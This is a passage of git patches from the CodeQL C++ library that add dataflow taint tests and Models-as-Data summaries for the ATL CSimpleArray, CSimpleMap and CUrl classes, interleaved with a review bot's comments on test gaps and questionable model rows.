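Review bot: `MStrPathTaintInheritingContent` in CPathT.qll has no QLDoc saying why `m_strPath` inherits taint; the reason is only in the commit subject. The class changes what every query sees when a `CPathT` field is read, so the intent should sit next to the code. I would add `/** Makes taint on a CPathT object readable through its m_strPath field. */` above the class, and a matching one-line comment on `MStrPath`.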
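Review bot: In the `Append` block of `test_CPathT` the two `+=` cases still sink `p.m_strPath` rather than the object that was assigned to, so `operator +=` is never checked. `p` is already tainted by `p.Append(x)`, so both annotations pass whatever the model does. The sinks should read `sink(p2.m_strPath);` after `p2 += p;` and `sink(p3.m_strPath);` after `p3 += x;`. The `operator +=` rows in the model only write to `ReturnValue[*]`, so the corrected lines may come out as `MISSING`, which is the gap the test ought to show. `test_CPathT` starts before this hunk.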
From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:20:24 +0000 Subject: [PATCH 0736/1267] C++: Add failing tests with 'CSimpleArray'. --- .../dataflow/taint-tests/atl.cpp | 47 +++++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 46 ++++++++++++++++++ 2 files changed, 93 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 46a147e555a..e2150016641 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -706,3 +706,50 @@ void test_CPathT() { sink(p2.GetExtension()); // $ ir } } + +template +struct CSimpleArray { + CSimpleArray(const CSimpleArray& src); + CSimpleArray(); + ~CSimpleArray(); + + BOOL Add(const T& t); + int Find(const T& t) const; + T* GetData() const; + int GetSize() const; + BOOL Remove(const T& t); + void RemoveAll(); + BOOL RemoveAt(int nIndex); + + BOOL SetAtIndex( + int nIndex, + const T& t); + + T& operator[](int nindex); + CSimpleArray & operator=(const CSimpleArray& src); +}; + +void test_CSimpleArray() { + int x = source(); + { + CSimpleArray a; + a.Add(x); + sink(a[0]); // $ MISSING: ir + a.Add(0); + sink(a[0]); // $ MISSING: ir + + CSimpleArray a2; + sink(a2[0]); + a2 = a; + sink(a2[0]); // $ MISSING: ir + } + { + CSimpleArray a; + a.Add(x); + sink(a.GetData()); // $ MISSING: ir + + CSimpleArray a2; + int pos = a2.Find(x); + sink(a2[pos]); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 961011dbd23..952f67e2a54 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
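Review bot: The last case in `test_CSimpleArray` expects taint at `sink(a2[pos])`, but `a2` is a fresh array that never receives `x`; `x` is only the search key passed to `Find`, whose result is an index. Recording that as `MISSING: ir` asks the model for flow the code does not have, and a model written to satisfy it would report clean containers as tainted. Either search the populated array (`int pos = a.Find(x); sink(a[pos]);`) or drop the annotation. The `FindKey`, `FindVal` and `ReverseLookup` blocks of `test_CSimpleMap`, added two commits later, have the same shape.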
@@ -800,6 +800,52 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:705:10:705:11 | p2 | | | atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:706:10:706:11 | p2 | | | atl.cpp:705:10:705:11 | p2 [post update] | atl.cpp:706:10:706:11 | p2 | | +| atl.cpp:733:11:733:21 | call to source | atl.cpp:736:11:736:11 | x | | +| atl.cpp:733:11:733:21 | call to source | atl.cpp:748:11:748:11 | x | | +| atl.cpp:733:11:733:21 | call to source | atl.cpp:752:23:752:23 | x | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:736:5:736:5 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:737:10:737:10 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:738:5:738:5 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:739:10:739:10 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:743:10:743:10 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:745:3:745:3 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:737:10:737:10 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:738:5:738:5 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:739:10:739:10 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:743:10:743:10 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:745:3:745:3 | a | | +| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:738:5:738:5 | a | | +| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:739:10:739:10 | a | | +| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:743:10:743:10 | a | | +| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:745:3:745:3 | a | | +| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:739:10:739:10 | a | | +| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:743:10:743:10 | a | | +| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:745:3:745:3 | a | | +| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:743:10:743:10 | a | | +| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:745:3:745:3 | a | | +| atl.cpp:741:23:741:24 | 
call to CSimpleArray | atl.cpp:742:10:742:11 | a2 | | +| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:743:5:743:6 | a2 | | +| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:744:10:744:11 | a2 | | +| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:745:3:745:3 | a2 | | +| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:743:5:743:6 | a2 | | +| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:744:10:744:11 | a2 | | +| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | +| atl.cpp:743:5:743:6 | ref arg a2 | atl.cpp:744:10:744:11 | a2 | | +| atl.cpp:743:5:743:6 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | +| atl.cpp:743:10:743:10 | a | atl.cpp:743:5:743:6 | ref arg a2 | TAINT | +| atl.cpp:743:10:743:10 | a | atl.cpp:743:8:743:8 | call to operator= | TAINT | +| atl.cpp:744:10:744:11 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | +| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:748:5:748:5 | a | | +| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:749:10:749:10 | a | | +| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:754:3:754:3 | a | | +| atl.cpp:748:5:748:5 | ref arg a | atl.cpp:749:10:749:10 | a | | +| atl.cpp:748:5:748:5 | ref arg a | atl.cpp:754:3:754:3 | a | | +| atl.cpp:749:10:749:10 | ref arg a | atl.cpp:754:3:754:3 | a | | +| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:752:15:752:16 | a2 | | +| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:753:10:753:11 | a2 | | +| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:754:3:754:3 | a2 | | +| atl.cpp:752:18:752:21 | call to Find | atl.cpp:753:13:753:15 | pos | | +| atl.cpp:753:10:753:11 | ref arg a2 | atl.cpp:754:3:754:3 | a2 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 02b88d5dbdafd21fb67ad6e94c42a7be6494f5f6 Mon Sep 17 00:00:00 2001 
From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:29:32 +0000 Subject: [PATCH 0737/1267] C++: Add MaD model for 'CSimpleArray'. --- cpp/ql/lib/ext/CSimpleArray.model.yml | 11 +++++++++++ .../test/library-tests/dataflow/taint-tests/atl.cpp | 8 ++++---- 2 files changed, 15 insertions(+), 4 deletions(-) create mode 100644 cpp/ql/lib/ext/CSimpleArray.model.yml diff --git a/cpp/ql/lib/ext/CSimpleArray.model.yml b/cpp/ql/lib/ext/CSimpleArray.model.yml new file mode 100644 index 00000000000..1c6337bf74c --- /dev/null +++ b/cpp/ql/lib/ext/CSimpleArray.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CSimpleArray", True, "CSimpleArray", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleArray", True, "Add", "", "", "Argument[*0]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CSimpleArray", True, "SetAtIndex", "", "", "Argument[*1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index e2150016641..531ca573c94 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
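Review bot: The copy-constructor and `SetAtIndex` rows of CSimpleArray.model.yml are not exercised by `test_CSimpleArray` as added in the previous commit, which only calls `Add`, `operator[]`, `operator=`, `GetData` and `Find`. A typo in either row's access path would go unnoticed. I would add a case that sinks an element of a copy-constructed array and one that sinks `a[0]` after `a.SetAtIndex(0, x);`. The file also ends without a trailing newline.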
@@ -734,19 +734,19 @@ void test_CSimpleArray() { { CSimpleArray a; a.Add(x); - sink(a[0]); // $ MISSING: ir + sink(a[0]); // $ ir a.Add(0); - sink(a[0]); // $ MISSING: ir + sink(a[0]); // $ ir CSimpleArray a2; sink(a2[0]); a2 = a; - sink(a2[0]); // $ MISSING: ir + sink(a2[0]); // $ ir } { CSimpleArray a; a.Add(x); - sink(a.GetData()); // $ MISSING: ir + sink(a.GetData()); // $ ir CSimpleArray a2; int pos = a2.Find(x); From 12674ea2e619613a482b3b3ac5875653d513ba51 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:31:45 +0000 Subject: [PATCH 0738/1267] C++: Add failing tests with 'CSimpleMap'. --- .../dataflow/taint-tests/atl.cpp | 55 +++++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 42 ++++++++++++++ 2 files changed, 97 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 531ca573c94..44c5df7018f 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
@@ -753,3 +753,58 @@ void test_CSimpleArray() { sink(a2[pos]); // $ MISSING: ir } } + +template +struct CSimpleMap { + CSimpleMap(); + ~CSimpleMap(); + + BOOL Add(const TKey& key, const TVal& val); + int FindKey(const TKey& key) const; + int FindVal(const TVal& val) const; + TKey& GetKeyAt(int nIndex) const; + int GetSize() const; + TVal& GetValueAt(int nIndex) const; + TVal Lookup(const TKey& key) const; + BOOL Remove(const TKey& key); + void RemoveAll(); + BOOL RemoveAt(int nIndex); + TKey ReverseLookup(const TVal& val) const; + BOOL SetAt(const TKey& key, const TVal& val); + BOOL SetAtIndex(int nIndex, const TKey& key, const TVal& val); +}; + +void test_CSimpleMap() { + wchar_t* x = source(); + { + CSimpleMap a; + a.Add("hello", x); + sink(a.Lookup("hello")); // $ MISSING: ir + } + { + CSimpleMap a; + auto pos = a.FindKey("hello"); + sink(a.GetValueAt(pos)); // $ MISSING: ir + } + { + CSimpleMap a; + auto pos = a.FindVal(x); + sink(a.GetValueAt(pos)); // $ MISSING: ir + } + { + CSimpleMap a; + auto key = a.ReverseLookup(x); + sink(key); + sink(a.Lookup(key)); // $ MISSING: ir + } + { + CSimpleMap a; + a.SetAt("hello", x); + sink(a.Lookup("hello")); // $ MISSING: ir + } + { + CSimpleMap a; + a.SetAtIndex(0, "hello", x); + sink(a.Lookup("hello")); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 952f67e2a54..395ba48f967 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
@@ -846,6 +846,48 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:754:3:754:3 | a2 | | | atl.cpp:752:18:752:21 | call to Find | atl.cpp:753:13:753:15 | pos | | | atl.cpp:753:10:753:11 | ref arg a2 | atl.cpp:754:3:754:3 | a2 | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:781:20:781:20 | x | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:791:26:791:26 | x | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:796:32:796:32 | x | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:802:22:802:22 | x | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:807:30:807:30 | x | | +| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:781:5:781:5 | a | | +| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:782:10:782:10 | a | | +| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:783:3:783:3 | a | | +| atl.cpp:781:5:781:5 | ref arg a | atl.cpp:782:10:782:10 | a | | +| atl.cpp:781:5:781:5 | ref arg a | atl.cpp:783:3:783:3 | a | | +| atl.cpp:782:10:782:10 | ref arg a | atl.cpp:783:3:783:3 | a | | +| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:786:16:786:16 | a | | +| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:787:10:787:10 | a | | +| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:788:3:788:3 | a | | +| atl.cpp:786:18:786:24 | call to FindKey | atl.cpp:787:23:787:25 | pos | | +| atl.cpp:787:10:787:10 | ref arg a | atl.cpp:788:3:788:3 | a | | +| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:791:16:791:16 | a | | +| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:792:10:792:10 | a | | +| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:793:3:793:3 | a | | +| atl.cpp:791:18:791:24 | call to FindVal | atl.cpp:792:23:792:25 | pos | | +| atl.cpp:792:10:792:10 | ref arg a | atl.cpp:793:3:793:3 | a | | +| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:796:16:796:16 | a | | +| atl.cpp:795:33:795:33 | call to CSimpleMap | 
atl.cpp:798:10:798:10 | a | | +| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:799:3:799:3 | a | | +| atl.cpp:796:16:796:16 | ref arg a | atl.cpp:798:10:798:10 | a | | +| atl.cpp:796:16:796:16 | ref arg a | atl.cpp:799:3:799:3 | a | | +| atl.cpp:796:18:796:30 | call to ReverseLookup | atl.cpp:797:10:797:12 | key | | +| atl.cpp:796:18:796:30 | call to ReverseLookup | atl.cpp:798:19:798:21 | key | | +| atl.cpp:797:10:797:12 | ref arg key | atl.cpp:798:19:798:21 | key | | +| atl.cpp:798:10:798:10 | ref arg a | atl.cpp:799:3:799:3 | a | | +| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:802:5:802:5 | a | | +| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:803:10:803:10 | a | | +| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:804:3:804:3 | a | | +| atl.cpp:802:5:802:5 | ref arg a | atl.cpp:803:10:803:10 | a | | +| atl.cpp:802:5:802:5 | ref arg a | atl.cpp:804:3:804:3 | a | | +| atl.cpp:803:10:803:10 | ref arg a | atl.cpp:804:3:804:3 | a | | +| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:807:5:807:5 | a | | +| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:808:10:808:10 | a | | +| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:809:3:809:3 | a | | +| atl.cpp:807:5:807:5 | ref arg a | atl.cpp:808:10:808:10 | a | | +| atl.cpp:807:5:807:5 | ref arg a | atl.cpp:809:3:809:3 | a | | +| atl.cpp:808:10:808:10 | ref arg a | atl.cpp:809:3:809:3 | a | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 74b6c9dcc75731e0922b47b085d8c058d7d6ef69 Mon Sep 17 00:00:00 2001 
From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:36:48 +0000 Subject: [PATCH 0739/1267] C++: Add MaD model for 'CSimpleMap'. --- cpp/ql/lib/ext/CSimpleMap.model.yml | 12 ++++++++++++ .../test/library-tests/dataflow/taint-tests/atl.cpp | 6 +++--- 2 files changed, 15 insertions(+), 3 deletions(-) create mode 100644 cpp/ql/lib/ext/CSimpleMap.model.yml diff --git a/cpp/ql/lib/ext/CSimpleMap.model.yml b/cpp/ql/lib/ext/CSimpleMap.model.yml new file mode 100644 index 00000000000..323b5be0174 --- /dev/null +++ b/cpp/ql/lib/ext/CSimpleMap.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CSimpleMap", True, "Add", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleMap", True, "GetValueAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "taint", "manual"] + - ["", "CSimpleMap", True, "Lookup", "", "", "Argument[-1].Element[@]", "ReturnValue.Element[@]", "value", "manual"] + - ["", "CSimpleMap", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleMap", True, "SetAtIndex", "", "", "Argument[*@2]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleMap", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CSimpleMap", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 44c5df7018f..fe76e3f2f93 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
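Review bot: The `operator[]` and `operator=` rows in CSimpleMap.model.yml look carried over from the CSimpleArray model; the `CSimpleMap` stub added to atl.cpp declares neither member, so no test can match them. `GetValueAt` is the only row with kind `taint`, and the test hunk in this commit flips no expectation that calls it, so that row is unverified. `Lookup` writes to `ReturnValue.Element[@]` although the stub returns `TVal` by value, which is inconsistent with the `ReturnValue[*@]` form used elsewhere. If these choices are deliberate, a one-line comment above the rows should say why; otherwise I would drop the two operator rows and make `GetValueAt` a `value` row like its neighbours.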
@@ -779,7 +779,7 @@ void test_CSimpleMap() { { CSimpleMap a; a.Add("hello", x); - sink(a.Lookup("hello")); // $ MISSING: ir + sink(a.Lookup("hello")); // $ ir } { CSimpleMap a; @@ -800,11 +800,11 @@ void test_CSimpleMap() { { CSimpleMap a; a.SetAt("hello", x); - sink(a.Lookup("hello")); // $ MISSING: ir + sink(a.Lookup("hello")); // $ ir } { CSimpleMap a; a.SetAtIndex(0, "hello", x); - sink(a.Lookup("hello")); // $ MISSING: ir + sink(a.Lookup("hello")); // $ ir } } From 1ea879a880c0e409b56f45248f55a35493b4d0fa Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:38:10 +0000 Subject: [PATCH 0740/1267] C++: Add failing tests for 'CUrl'. --- .../dataflow/taint-tests/atl.cpp | 89 +++++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 66 ++++++++++++++ 2 files changed, 155 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index fe76e3f2f93..1727684b51a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
@@ -808,3 +808,92 @@ void test_CSimpleMap() { sink(a.Lookup("hello")); // $ ir } } + +struct CUrl { + CUrl& operator= (const CUrl& urlThat) throw(); + CUrl() throw(); + CUrl(const CUrl& urlThat) throw(); + ~CUrl() throw(); + + inline BOOL Canonicalize(DWORD dwFlags) throw(); + inline void Clear() throw(); + + BOOL CrackUrl(LPCTSTR lpszUrl, DWORD dwFlags) throw(); + inline BOOL CreateUrl(LPTSTR lpszUrl, DWORD* pdwMaxLength, DWORD dwFlags) const throw(); + + inline LPCTSTR GetExtraInfo() const throw(); + inline DWORD GetExtraInfoLength() const throw(); + inline LPCTSTR GetHostName() const throw(); + inline DWORD GetHostNameLength() const throw(); + inline LPCTSTR GetPassword() const throw(); + inline DWORD GetPasswordLength() const throw(); + inline ATL_URL_PORT GetPortNumber() const throw(); + inline ATL_URL_SCHEME GetScheme() const throw(); + inline LPCTSTR GetSchemeName() const throw(); + inline DWORD GetSchemeNameLength() const throw(); + inline DWORD GetUrlLength() const throw(); + inline LPCTSTR GetUrlPath() const throw(); + inline DWORD GetUrlPathLength() const throw(); + inline LPCTSTR GetUserName() const throw(); + inline DWORD GetUserNameLength() const throw(); + inline BOOL SetExtraInfo(LPCTSTR lpszInfo) throw(); + inline BOOL SetHostName(LPCTSTR lpszHost) throw(); + inline BOOL SetPassword(LPCTSTR lpszPass) throw(); + inline BOOL SetPortNumber(ATL_URL_PORT nPrt) throw(); + inline BOOL SetScheme(ATL_URL_SCHEME nScheme) throw(); + inline BOOL SetSchemeName(LPCTSTR lpszSchm) throw(); + inline BOOL SetUrlPath(LPCTSTR lpszPath) throw(); + inline BOOL SetUserName(LPCTSTR lpszUser) throw(); +}; + +void test_CUrl() { + char* x = indirect_source(); + CUrl url; + url.CrackUrl(x, 0); + sink(url); // $ MISSING: ir + sink(url.GetExtraInfo()); // $ MISSING: ir + sink(url.GetHostName()); // $ MISSING: ir + sink(url.GetPassword()); // $ MISSING: ir + sink(url.GetSchemeName()); // $ MISSING: ir + sink(url.GetUrlPath()); // $ MISSING: ir + sink(url.GetUserName()); // $ 
MISSING: ir + + { + CUrl url2; + DWORD len; + char buffer[1024]; + url2.CrackUrl(x, 0); + url2.CreateUrl(buffer, &len, 0); + sink(buffer); // $ ast MISSING: ir + } + { + CUrl url2; + url2.SetExtraInfo(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetHostName(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetPassword(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetSchemeName(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetUrlPath(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetUserName(x); + sink(url2); // $ MISSING: ir + } +} \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 395ba48f967..3f77cb77b9c 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
@@ -888,6 +888,72 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:807:5:807:5 | ref arg a | atl.cpp:808:10:808:10 | a | | | atl.cpp:807:5:807:5 | ref arg a | atl.cpp:809:3:809:3 | a | | | atl.cpp:808:10:808:10 | ref arg a | atl.cpp:809:3:809:3 | a | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:852:16:852:16 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:865:19:865:19 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:871:23:871:23 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:876:22:876:22 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:881:22:881:22 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:886:24:886:24 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:891:21:891:21 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:896:22:896:22 | x | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:852:3:852:5 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:853:8:853:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:854:8:854:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:855:8:855:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:856:8:856:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:857:8:857:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:858:8:858:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:859:8:859:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:899:1:899:1 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:853:8:853:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:854:8:854:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:855:8:855:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:856:8:856:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:857:8:857:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | 
atl.cpp:858:8:858:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:859:8:859:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:899:1:899:1 | url | | +| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:865:5:865:8 | url2 | | +| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:866:5:866:8 | url2 | | +| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:868:3:868:3 | url2 | | +| atl.cpp:863:11:863:13 | len | atl.cpp:866:29:866:31 | len | | +| atl.cpp:864:10:864:15 | buffer | atl.cpp:866:20:866:25 | buffer | | +| atl.cpp:864:10:864:15 | buffer | atl.cpp:867:10:867:15 | buffer | | +| atl.cpp:865:5:865:8 | ref arg url2 | atl.cpp:866:5:866:8 | url2 | | +| atl.cpp:865:5:865:8 | ref arg url2 | atl.cpp:868:3:868:3 | url2 | | +| atl.cpp:866:20:866:25 | ref arg buffer | atl.cpp:867:10:867:15 | buffer | | +| atl.cpp:866:28:866:31 | ref arg & ... | atl.cpp:866:29:866:31 | len [inner post update] | | +| atl.cpp:866:29:866:31 | len | atl.cpp:866:28:866:31 | & ... | | +| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:871:5:871:8 | url2 | | +| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:872:10:872:13 | url2 | | +| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:873:3:873:3 | url2 | | +| atl.cpp:871:5:871:8 | ref arg url2 | atl.cpp:872:10:872:13 | url2 | | +| atl.cpp:871:5:871:8 | ref arg url2 | atl.cpp:873:3:873:3 | url2 | | +| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:876:5:876:8 | url2 | | +| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:877:10:877:13 | url2 | | +| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:878:3:878:3 | url2 | | +| atl.cpp:876:5:876:8 | ref arg url2 | atl.cpp:877:10:877:13 | url2 | | +| atl.cpp:876:5:876:8 | ref arg url2 | atl.cpp:878:3:878:3 | url2 | | +| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:881:5:881:8 | url2 | | +| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:882:10:882:13 | url2 | | +| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:883:3:883:3 | url2 | | +| atl.cpp:881:5:881:8 | ref arg url2 | atl.cpp:882:10:882:13 | url2 
